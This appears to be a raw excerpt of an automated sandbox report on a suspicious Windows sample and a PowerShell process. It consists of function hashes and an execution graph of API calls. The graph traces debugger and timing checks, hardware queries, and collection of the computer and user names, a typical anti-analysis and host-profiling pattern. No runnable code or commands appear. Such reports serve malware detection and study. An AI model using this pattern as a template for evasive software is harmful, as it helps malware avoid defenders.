                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeavefree
                                                                                                    • String ID:
                                                                                                    • API String ID: 4020351045-0
                                                                                                    • Opcode ID: f08af047a3a9549d0bf6df4144a8100a2ada89aaca3a8e220c562b1c483d70f5
                                                                                                    • Instruction ID: 5cafa864f396b08700137da7a04e396561ebcc91dc39674656d2ef4c74ec3d5f
                                                                                                    • Opcode Fuzzy Hash: f08af047a3a9549d0bf6df4144a8100a2ada89aaca3a8e220c562b1c483d70f5
                                                                                                    • Instruction Fuzzy Hash: DC115E21F2E60386FAD4AB90D88013CF3A0AF98B80BD44033C55D67260DF3DE96597B0

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9B8845FB Relevance: .6, Instructions: 638COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 102289505dbfbd781b1738947b12244bad7122a8a7aaa9e7d132e25b4d829eab
                                                                                                    • Instruction ID: 488aad71f3db09bcbe193f19acdd60316d5c1f3a9483b82b2a1b07c3ebe14462
                                                                                                    • Opcode Fuzzy Hash: 102289505dbfbd781b1738947b12244bad7122a8a7aaa9e7d132e25b4d829eab
                                                                                                    • Instruction Fuzzy Hash: 70123B32B0EA9D4FEB55EB9CD8619E97BE0EF59314F0941BBC059C71A3DD34A8428780
                                                                                                    Function 00007FFD9B950ACD Relevance: .4, Instructions: 377COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80371e12fd18c8b39a0bc1b1d7a752072202b45c717c1e3f2c7257ffb69a51d8
                                                                                                    • Instruction ID: ab26a69fcc76027fce7059d7db271c6b36aa64e50c7a6a4667c4b8aed7897c59
                                                                                                    • Opcode Fuzzy Hash: 80371e12fd18c8b39a0bc1b1d7a752072202b45c717c1e3f2c7257ffb69a51d8
                                                                                                    • Instruction Fuzzy Hash: 81B14362B5FBCA1FE76687A848752B07BE1EF53610B0A01FBD88DC71E3D9486805C342
                                                                                                    Function 00007FFD9B955B8F Relevance: .2, Instructions: 163COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0d7708174ddc848875b007e5f3d42e279a4ae5e4f0d468bdc0db654f978a3b13
                                                                                                    • Instruction ID: c4191f671b699ebfff644d439a25ee6203e45577ed8f44ad8321c1073eea1d92
                                                                                                    • Opcode Fuzzy Hash: 0d7708174ddc848875b007e5f3d42e279a4ae5e4f0d468bdc0db654f978a3b13
                                                                                                    • Instruction Fuzzy Hash: 91417622B5EB890FD7569BBC98656717BE0DF56310B0901FFD488CB1E3D909A885C382
                                                                                                    Function 00007FFD9B88A925 Relevance: .1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58ab08bbc210ae2c4394712dee00a5804f23766aff60b90c6f8678e38a642f1e
                                                                                                    • Instruction ID: 1b1334cfff86b8342ab62b21b29b81638050a758be624f8c24e973ce184b2c94
                                                                                                    • Opcode Fuzzy Hash: 58ab08bbc210ae2c4394712dee00a5804f23766aff60b90c6f8678e38a642f1e
                                                                                                    • Instruction Fuzzy Hash: FD31E87191CB4C4FDB19DB5C984A6E9BBE0FB59320F00426FE449D3262DA74A855CBC3
                                                                                                    Function 00007FFD9B76ED40 Relevance: .1, Instructions: 126COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2163613397.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b76d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a5d26b19c99b1fe0f0d52f3c0848e63f5cc4cdbddca0fd559fd5524247715a61
                                                                                                    • Instruction ID: 54ab527595d773d69215f5200e2bd9e7fb2f35e900ad68af805dceddfea494e5
                                                                                                    • Opcode Fuzzy Hash: a5d26b19c99b1fe0f0d52f3c0848e63f5cc4cdbddca0fd559fd5524247715a61
                                                                                                    • Instruction Fuzzy Hash: FE41F67140EBC48FE7569B2898559523FF0EF56220B1A06DFD088CB1B7D629AC46C7A3
                                                                                                    Function 00007FFD9B950B9A Relevance: .1, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: daaf4f57258c4602093ee06fbd3dc41ac48ffb3ae4895f4edec5eeedc8fa6cdd
                                                                                                    • Instruction ID: 5f66cb8522a3729f8919a649768009a7231528bea308b2dca93a6d02225759b6
                                                                                                    • Opcode Fuzzy Hash: daaf4f57258c4602093ee06fbd3dc41ac48ffb3ae4895f4edec5eeedc8fa6cdd
                                                                                                    • Instruction Fuzzy Hash: BB310422B5FA8A1FE7B597E848B527467C2EF13754B1E00BADC9DC31E2DD4868448301
                                                                                                    Function 00007FFD9B88B868 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f98565ece8e49bd649ef7d7e2c839dd0ecac69f8fc0837e505d60ebb47a82c65
                                                                                                    • Instruction ID: a6c7b15543094676225a0538437372c4fd2ad1ec3b40510cc115097e08ea02f0
                                                                                                    • Opcode Fuzzy Hash: f98565ece8e49bd649ef7d7e2c839dd0ecac69f8fc0837e505d60ebb47a82c65
                                                                                                    • Instruction Fuzzy Hash: 0921073090CB4C8FDB59DBAC984A7E9BBE0EB96321F04426FD448C3162DA74A456CB91
                                                                                                    Function 00007FFD9B955C29 Relevance: .0, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c7f4dffef0a96a6dd2f3ed9acf60cbcc4c19ff9a2d96e0d1bd1621c80f2d4e26
                                                                                                    • Instruction ID: b57e6a33e56643d8c9e10615b212ec6a401d352f3838c12436aabc98022b56dc
                                                                                                    • Opcode Fuzzy Hash: c7f4dffef0a96a6dd2f3ed9acf60cbcc4c19ff9a2d96e0d1bd1621c80f2d4e26
                                                                                                    • Instruction Fuzzy Hash: 4CF01D3234DE0D8FDA64EA4DB851AB173D0E768321B14456FC04EC76A2DA22EC8587C2
                                                                                                    Function 00007FFD9B883A05 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                    • Instruction ID: f0af2805fbbbe5466374fa53b23b308fcc7f7dfa9eba101f48ecac0f0889acc5
                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                    • Instruction Fuzzy Hash: 8801677121CB0C4FD748EF0CE451AA5B7E0FB99364F10056DE59AC36A5D636E881CB45
                                                                                                    Function 00007FFD9B88B6A8 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0365ff841eeedbfd27d03cdd6a666d831f775565fd5eb460206d31add7bdde7c
                                                                                                    • Instruction ID: d7b6b8a020ea74176333b894ee3c088b0fb7097388935c725071ef9a84d5f5f0
                                                                                                    • Opcode Fuzzy Hash: 0365ff841eeedbfd27d03cdd6a666d831f775565fd5eb460206d31add7bdde7c
                                                                                                    • Instruction Fuzzy Hash: 4DF0F63080968D8FDB06DF2488259D57FA0FF16210B050297D458C71B2DB759558C7C2
                                                                                                    Function 00007FFD9B9551DD Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aa0066fc0e3429d91a8c6014ca4d33c9be3afb8868d8f264adc228e2c53586fb
                                                                                                    • Instruction ID: aca6d578cf4827903bf9438beb40a27af3c9e5f672e5fbc03abade68bf6e83ce
                                                                                                    • Opcode Fuzzy Hash: aa0066fc0e3429d91a8c6014ca4d33c9be3afb8868d8f264adc228e2c53586fb
                                                                                                    • Instruction Fuzzy Hash: AFF08232B5D5498FDB68DB9CE4509A477E0EF4532071500BAE05DCB5B3CA25EC45C740
                                                                                                    Function 00007FFD9B955490 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 007d776da48d4988703c05977756c3cd94b18d732386b4dfeebc1f14a4c4aed2
                                                                                                    • Instruction ID: 1dceba58c1dfadc8205cb673d99480662fb0f2f8427baf9484a673b9e8ed1f80
                                                                                                    • Opcode Fuzzy Hash: 007d776da48d4988703c05977756c3cd94b18d732386b4dfeebc1f14a4c4aed2
                                                                                                    • Instruction Fuzzy Hash: 1EF0BE32B0E5098FD764EA9CE0529A873E0EF4532170500B6E05DCB0A3CA25AC40C740
                                                                                                    Function 00007FFD9B9551A1 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e3aa1fea05e39b6158c9e92501d6841b774f2cb55015118281aa20323e80e685
                                                                                                    • Instruction ID: be221a741ec9df8c4a8f83bb3702e36c0c5c85beabd49f6d4dcab81aa8f6b500
                                                                                                    • Opcode Fuzzy Hash: e3aa1fea05e39b6158c9e92501d6841b774f2cb55015118281aa20323e80e685
                                                                                                    • Instruction Fuzzy Hash: ADF0E231B9E5498FDB68EB8CE4609A877E0EF45320B1540BBE01DCB0B7CA26ED41C740

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD9B8885FA Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: N_^$N_^$N_^$N_^
                                                                                                    • API String ID: 0-3900292545
                                                                                                    • Opcode ID: 233510fda95320636c26a472bc2e5412da9fcc5b2a17202952940bc1b228c9dc
                                                                                                    • Instruction ID: f5f3a0dfa210c3294dac527739bc9b13e16556b694ddd8763237acc0d07f793c
                                                                                                    • Opcode Fuzzy Hash: 233510fda95320636c26a472bc2e5412da9fcc5b2a17202952940bc1b228c9dc
                                                                                                    • Instruction Fuzzy Hash: 4C41A292E0FEE75BE76297B9887D4D43BA0EF15364B4A01F7C4F9870E3AD2929034251

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:8.4%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:960
                                                                                                    Total number of Limit Nodes:7
                                                                                                    execution_graph 22773 bf5232 22774 bf523e __FrameHandler3::FrameUnwindToState 22773->22774 22799 bf5472 22774->22799 22776 bf5245 22777 bf539e 22776->22777 22785 bf526f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 22776->22785 22897 bf5b6a 4 API calls 2 library calls 22777->22897 22779 bf53a5 22898 c00060 23 API calls __purecall 22779->22898 22781 bf53ab 22899 c00024 23 API calls __purecall 22781->22899 22783 bf53b3 22784 bf528e 22785->22784 22786 bf530f 22785->22786 22893 c0003a 41 API calls 4 library calls 22785->22893 22807 bffc9c 22786->22807 22789 bf5315 22811 be46e0 22789->22811 22793 bf5336 22793->22779 22794 bf533a 22793->22794 22795 bf5343 22794->22795 22895 c00015 23 API calls __purecall 22794->22895 22896 bf55e3 77 API calls ___scrt_uninitialize_crt 22795->22896 22798 bf534c 22798->22784 22800 bf547b 22799->22800 22900 bf5815 IsProcessorFeaturePresent 22800->22900 22802 bf5487 22901 bf8700 10 API calls 2 library calls 22802->22901 22804 bf5490 22804->22776 22805 bf548c 22805->22804 22902 bf871f 7 API calls 2 library calls 22805->22902 22808 bffca5 22807->22808 22810 bffcaa 22807->22810 22903 bff9f6 55 API calls 22808->22903 22810->22789 22904 be3b60 GetSystemInfo 22811->22904 22813 be4712 22872 be501d error_info_injector 22813->22872 22914 be3f90 IsDebuggerPresent 22813->22914 22816 be5040 22894 bf5c8a GetModuleHandleW 22816->22894 22818 be4727 SHGetFolderPathA 22819 be4763 22818->22819 22819->22819 22923 be2830 22819->22923 22821 be477f 22822 be5044 22821->22822 22823 be47d0 22821->22823 23229 be1bd0 43 API calls 22822->23229 22939 be2a70 22823->22939 22826 be5049 23230 bf9dff 41 API calls 2 library calls 22826->23230 22827 be4800 22952 be2760 22827->22952 22830 be504e 23231 be1bd0 43 API calls 22830->23231 22831 be481a 22956 be6190 22831->22956 22834 be5053 23232 bf9dff 41 API calls 2 library calls 22834->23232 22836 be48b1 error_info_injector 22836->22830 22842 be4905 22836->22842 22837 be5058 23233 be1bd0 43 API calls 22837->23233 22838 be4828 error_info_injector 22838->22826 22838->22836 22840 be505d 23234 bf9dff 41 API calls 2 library calls 22840->23234 22843 be2a70 43 API calls 22842->22843 22845 be4934 22843->22845 22844 be5062 23235 bf9dff 41 API calls 2 library calls 22844->23235 22848 be2760 43 API calls 22845->22848 22847 be5067 23236 bf9dff 41 API calls 2 library calls 22847->23236 22850 be494e 22848->22850 22961 be2530 22850->22961 22853 be49aa 22854 be6190 41 API calls 22853->22854 22855 be49e3 error_info_injector 22854->22855 22855->22834 22856 be4aaa error_info_injector 22855->22856 22856->22837 22857 be4af6 22856->22857 22858 be2a70 43 API calls 22857->22858 22859 be4b25 22858->22859 22860 be2760 43 API calls 22859->22860 22861 be4b3f 22860->22861 22862 be2530 43 API calls 22861->22862 22863 be4b9b 22862->22863 22864 be6190 41 API calls 22863->22864 22867 be4bd4 error_info_injector 22864->22867 22865 be4c9b error_info_injector 22966 be4350 22865->22966 22867->22840 22867->22865 22869 be4cb2 GetModuleFileNameA 22871 be4cd0 22869->22871 22870 be4fea 22870->22847 22870->22872 22871->22871 22994 be85d0 22871->22994 23222 bf53be 22872->23222 22874 be4ceb GetComputerNameA GetUserNameA 22875 be4d44 22874->22875 22875->22875 22876 be2830 43 API calls 22875->22876 22877 be4d60 22876->22877 22878 be2830 43 API calls 22877->22878 22879 be4dac 22878->22879 22880 be2530 43 API calls 22879->22880 22881 be4dec 22880->22881 23015 be96c0 22881->23015 22883 be4e37 22884 be6190 41 API calls 22883->22884 22886 be4e48 error_info_injector 22884->22886 22885 be4fec 23221 bf3210 107 API calls 6 library calls 22885->23221 22886->22844 22890 be4f4d error_info_injector 22886->22890 22888 be4fe0 23032 be4050 22888->23032 22890->22885 22890->22888 22893->22786 22894->22793 22895->22795 22896->22798 22897->22779 22898->22781 22899->22783 22900->22802 22901->22805 22902->22804 22903->22810 22905 be3c64 22904->22905 22906 be3b93 GlobalMemoryStatusEx 22904->22906 22907 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22905->22907 22906->22905 22909 be3bbe 22906->22909 22908 be3c74 22907->22908 22908->22813 22909->22909 22910 be3be0 CreateFileA DeviceIoControl 22909->22910 22911 be3c2f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22910->22911 22912 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22911->22912 22913 be3c60 22912->22913 22913->22813 22915 be3fc4 22914->22915 22922 be4025 22914->22922 22915->22922 23237 be3c80 CloseHandle 22915->23237 22916 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22917 be4042 22916->22917 22917->22818 22917->22872 22919 be3fd2 22920 be3fd6 GetModuleHandleW GetProcAddress 22919->22920 22919->22922 22921 be3ffa GetTickCount64 NtDelayExecution GetTickCount64 22920->22921 22920->22922 22921->22922 22922->22916 22924 be28ff 22923->22924 22925 be2851 22923->22925 23249 be1bd0 43 API calls 22924->23249 22926 be285d _Yarn 22925->22926 22928 be2881 22925->22928 22930 be28be 22925->22930 22931 be28c7 22925->22931 22926->22821 23238 bf53cc 22928->23238 22929 be2904 23250 be1b30 43 API calls 2 library calls 22929->23250 22930->22928 22930->22929 22935 bf53cc std::_Facet_Register 43 API calls 22931->22935 22938 be289b _Yarn 22931->22938 22935->22938 22936 be2894 22936->22938 23251 bf9dff 41 API calls 2 library calls 22936->23251 22938->22821 22940 be2ab4 22939->22940 22945 be2adf _Yarn 22939->22945 22941 be2ac1 22940->22941 22942 be2b0d 22940->22942 22943 be2b04 22940->22943 22946 bf53cc std::_Facet_Register 43 API calls 22941->22946 22942->22945 22947 bf53cc std::_Facet_Register 43 API calls 22942->22947 22943->22941 22944 be2b5e 22943->22944 23264 be1b30 43 API calls 2 library calls 22944->23264 22945->22827 22948 be2ad4 22946->22948 22947->22945 22948->22945 23265 bf9dff 41 API calls 2 library calls 22948->23265 22953 be277b 22952->22953 22955 be278f _Yarn 22953->22955 23266 be2910 43 API calls 4 library calls 22953->23266 22955->22831 22957 be61c1 error_info_injector 22956->22957 22958 be619e 22956->22958 22957->22838 22958->22957 23267 bf9dff 41 API calls 2 library calls 22958->23267 22962 be2540 22961->22962 22962->22962 22965 be2557 _Yarn 22962->22965 23268 be2910 43 API calls 4 library calls 22962->23268 22964 be2592 22964->22853 22965->22853 22967 be4399 __fread_nolock 22966->22967 23269 be84a0 22967->23269 22972 be44c5 23297 be3a20 22972->23297 22976 be4465 23295 be7370 41 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 22976->23295 22977 be44fe error_info_injector 23308 be5bb0 22977->23308 22980 be4473 23296 be8930 67 API calls 7 library calls 22980->23296 22981 be45dc std::ios_base::_Ios_base_dtor 22986 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22981->22986 22983 be4546 OpenProcess 22983->22977 22984 be456c 22983->22984 22984->22977 22988 be463d 22984->22988 22989 be4639 22986->22989 22987 be4497 22987->22977 23307 bfd2c0 44 API calls ___std_exception_copy 22987->23307 23312 bf9dff 41 API calls 2 library calls 22988->23312 22989->22869 22989->22870 22998 be85ee _Yarn 22994->22998 22999 be8614 22994->22999 22995 be86f4 23575 be1bd0 43 API calls 22995->23575 22997 be86f9 23576 be1b30 43 API calls 2 library calls 22997->23576 22998->22874 22999->22995 23000 be864f 22999->23000 23001 be8683 22999->23001 23000->22997 23002 bf53cc std::_Facet_Register 43 API calls 23000->23002 23005 bf53cc std::_Facet_Register 43 API calls 23001->23005 23009 be866f _Yarn 23001->23009 23002->23009 23004 be86fe 23577 bfc9be 14 API calls ___free_lconv_mon 23004->23577 23005->23009 23008 be8714 23578 bfc9be 14 API calls ___free_lconv_mon 23008->23578 23012 be86d6 error_info_injector 23009->23012 23574 bf9dff 41 API calls 2 library calls 23009->23574 23011 be871c 23579 bfc9be 14 API calls ___free_lconv_mon 23011->23579 23012->22874 23014 be8724 error_info_injector 23014->22874 23016 be9703 23015->23016 23017 be988e 23016->23017 23018 be97cd 23016->23018 23025 be9708 _Yarn 23016->23025 23580 be1bd0 43 API calls 23017->23580 23019 be97da 23018->23019 23022 be9829 23018->23022 23023 be9820 23018->23023 23026 bf53cc std::_Facet_Register 43 API calls 23019->23026 23021 be9893 23581 be1b30 43 API calls 2 library calls 23021->23581 23027 bf53cc std::_Facet_Register 43 API calls 23022->23027 23031 be97fa _Yarn 23022->23031 23023->23019 23023->23021 23025->22883 23028 be97ef 23026->23028 23027->23031 23028->23031 23582 bf9dff 41 API calls 2 library calls 23028->23582 23031->22883 23033 be4099 __fread_nolock 23032->23033 23034 be84a0 75 API calls 23033->23034 23035 be4103 23034->23035 23036 be7570 47 API calls 23035->23036 23037 be413c 23036->23037 23038 be41b5 23037->23038 23039 bf47ac 72 API calls 23037->23039 23040 be3a20 43 API calls 23038->23040 23041 be4150 23039->23041 23042 be41de GetCurrentProcessId 23040->23042 23041->23038 23043 be4157 23041->23043 23583 be5f10 23042->23583 23593 be7370 41 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23043->23593 23047 be4165 23594 be8930 67 API calls 7 library calls 23047->23594 23048 be7480 72 API calls 23049 be4202 23048->23049 23050 be422f 23049->23050 23052 be3a20 43 API calls 23049->23052 23053 be5bb0 72 API calls 23050->23053 23052->23050 23054 be4261 std::ios_base::_Ios_base_dtor 23053->23054 23055 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23054->23055 23056 be42b8 23055->23056 23058 bea030 23056->23058 23057 be4189 23057->23042 23598 be3560 23058->23598 23062 bea0a4 23622 bed000 23062->23622 23066 bea156 23660 be25f0 23066->23660 23068 bea42a 23664 becf30 23068->23664 23070 bea6bc 23071 be25f0 43 API calls 23070->23071 23072 beaa2a 23071->23072 23073 becf30 75 API calls 23072->23073 23074 beadfc 23073->23074 23074->23074 23075 be2830 43 API calls 23074->23075 23076 beb192 23075->23076 23077 bed000 75 API calls 23076->23077 23078 beb1df 23077->23078 23079 bed570 43 API calls 23078->23079 23080 beb216 23079->23080 23081 be2830 43 API calls 23080->23081 23082 beb2ac 23081->23082 23083 bed000 75 API calls 23082->23083 23084 beb2ff 23083->23084 23085 bed570 43 API calls 23084->23085 23086 beb336 23085->23086 23087 be2830 43 API calls 23086->23087 23088 beb3cc 23087->23088 23089 bed000 75 API calls 23088->23089 23090 beb43f 23089->23090 23091 bed570 43 API calls 23090->23091 23092 beb476 23091->23092 23093 be2830 43 API calls 23092->23093 23094 beb4f4 23093->23094 23095 bed000 75 API calls 23094->23095 23096 beb55f 23095->23096 23097 bed570 43 API calls 23096->23097 23098 beb596 23097->23098 23099 be2830 43 API calls 23098->23099 23100 beb614 23099->23100 23101 bed000 75 API calls 23100->23101 23102 beb66f 23101->23102 23103 bed570 43 API calls 23102->23103 23104 beb6a6 23103->23104 23105 be2830 43 API calls 23104->23105 23106 beb744 23105->23106 23107 bed000 75 API calls 23106->23107 23108 beb79f 23107->23108 23109 bed570 43 API calls 23108->23109 23110 beb7d6 23109->23110 23111 be2830 43 API calls 23110->23111 23112 beb86c 23111->23112 23113 bed000 75 API calls 23112->23113 23114 beb8bf 23113->23114 23115 bed570 43 API calls 23114->23115 23116 beb8f6 23115->23116 23117 be2830 43 API calls 23116->23117 23118 beb98c 23117->23118 23119 bed000 75 API calls 23118->23119 23120 beba0f 23119->23120 23121 bed570 43 API calls 23120->23121 23122 beba46 23121->23122 23123 be2830 43 API calls 23122->23123 23124 bebac4 23123->23124 23125 bed000 75 API calls 23124->23125 23126 bebb1f 23125->23126 23127 bed570 43 API calls 23126->23127 23128 bebb56 23127->23128 23129 be2830 43 API calls 23128->23129 23130 bebc14 23129->23130 23131 bed000 75 API calls 23130->23131 23132 bebc6f 23131->23132 23133 bed570 43 API calls 23132->23133 23134 bebca6 23133->23134 23135 be2830 43 API calls 23134->23135 23136 bebd64 23135->23136 23137 bed000 75 API calls 23136->23137 23138 bebdb1 23137->23138 23139 bed570 43 API calls 23138->23139 23140 bebde6 23139->23140 23141 be2830 43 API calls 23140->23141 23142 bebe64 23141->23142 23143 bed000 75 API calls 23142->23143 23144 bebedd 23143->23144 23145 bed570 43 API calls 23144->23145 23146 bebf16 23145->23146 23147 be2830 43 API calls 23146->23147 23148 bebfa4 23147->23148 23149 bed000 75 API calls 23148->23149 23150 bec00f 23149->23150 23151 bed570 43 API calls 23150->23151 23152 bec046 23151->23152 23153 be2830 43 API calls 23152->23153 23154 bec0c4 23153->23154 23155 bed000 75 API calls 23154->23155 23156 bec12f 23155->23156 23157 bed570 43 API calls 23156->23157 23158 bec166 23157->23158 23159 be2830 43 API calls 23158->23159 23160 bec1ec 23159->23160 23161 bed000 75 API calls 23160->23161 23162 bec23f 23161->23162 23163 bed570 43 API calls 23162->23163 23164 bec276 23163->23164 23165 be2830 43 API calls 23164->23165 23166 bec2f4 23165->23166 23167 bed000 75 API calls 23166->23167 23168 bec35f 23167->23168 23169 bed570 43 API calls 23168->23169 23170 bec396 23169->23170 23171 be2830 43 API calls 23170->23171 23172 bec424 23171->23172 23173 bed000 75 API calls 23172->23173 23174 bec470 23173->23174 23175 bed570 43 API calls 23174->23175 23176 bec4a6 23175->23176 23177 be2830 43 API calls 23176->23177 23178 bec574 23177->23178 23179 bed000 75 API calls 23178->23179 23180 bec5d1 23179->23180 23181 bed570 43 API calls 23180->23181 23182 bec606 23181->23182 23183 be2830 43 API calls 23182->23183 23184 bec6ac 23183->23184 23185 bed000 75 API calls 23184->23185 23186 bec6ff 23185->23186 23187 bed570 43 API calls 23186->23187 23188 bec736 23187->23188 23188->23188 23189 be25f0 43 API calls 23188->23189 23190 bec9fc 23189->23190 